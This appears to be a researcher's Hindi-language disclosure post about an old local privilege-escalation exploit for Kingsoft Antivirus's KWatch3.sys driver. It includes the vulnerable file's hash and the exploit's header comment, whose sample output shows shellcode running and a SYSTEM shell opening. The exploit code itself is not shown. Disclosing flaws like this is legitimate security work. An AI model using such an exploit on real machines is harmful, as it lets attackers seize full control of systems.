
Kingsoft एंटीवायरस KWatch ड्राइवर संस्करण 2009.3.17.77 में एक स्थानीय EoP भेद्यता का वर्षों पुराना शोषण।
Kingsoft Antivirus KWatch ड्राइवर संस्करण 2009.3.17.77 में एक स्थानीय EoP भेद्यता का एक वर्षों पुराना शोषण।
मैंने जनवरी 2014 में इस मुद्दे की सूचना दी थी और 8+ वर्षों बाद CVE के बारे में सूचित किया गया। मैंने इसे अपलोड करने का निर्णय लिया क्योंकि अपना पुराना कोड ढूंढना और इतना समय लगना काफी मनोरंजक है।
इस प्रकार, नए CVE के बावजूद यह कोई नई भेद्यता नहीं होनी चाहिए -- एक त्वरित खोज ने पहले से ही समान दिखने वाली भेद्यता के लिए कई रिपोर्ट दिखाईं।
मैं अभी भी IPA को उनके कर्तव्य निभाने और मेरा दिन बनाने के लिए धन्यवाद करता हूं।
कमजोर फ़ाइल ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479 प्रतीत होती है
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/